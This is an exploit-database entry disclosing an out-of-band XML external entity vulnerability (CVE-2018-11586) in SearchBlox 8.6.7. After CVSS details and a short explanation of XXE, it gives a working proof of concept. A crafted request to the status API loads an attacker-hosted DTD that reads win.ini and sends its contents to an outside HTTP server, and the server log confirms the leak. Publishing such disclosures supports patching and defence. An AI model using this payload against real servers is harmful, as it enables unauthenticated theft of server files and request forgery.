SearchBlox 8.6.7 XML External Entity Injection

2018.06.04
Credit: Canberk BOLAT
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-918


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE) # Exploit Author: Ahmet GUREL, Canberk BOLAT # Software Link: https://www.searchblox.com/ # Version: < = SearchBlox Version 8.6.7 # Platform: Java # Tested on: Windows # CVE: CVE-2018-11586 # 1. DETAILS An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Reference: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing # 2. PoC: XML external entity (XXE) vulnerability in /searchblox/api/rest/status in SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. HTTP Request: _____________ GET /searchblox/api/rest/status HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci; XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5; AdsOnSearchPage=5 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 140 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE xxe [ <!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd"> %dtd; %all; %send;]> #Ext.dtd File : _______________ <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % file SYSTEM "file:///C:/windows/win.ini"> <!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://192.168.1.2:7000/?%file; '>"> %all; #HTTP Response: _______________ Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000 Serving HTTP on 0.0.0.0 port 7000 ... 192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 - 192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1 HTTP/1.1" 200 -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top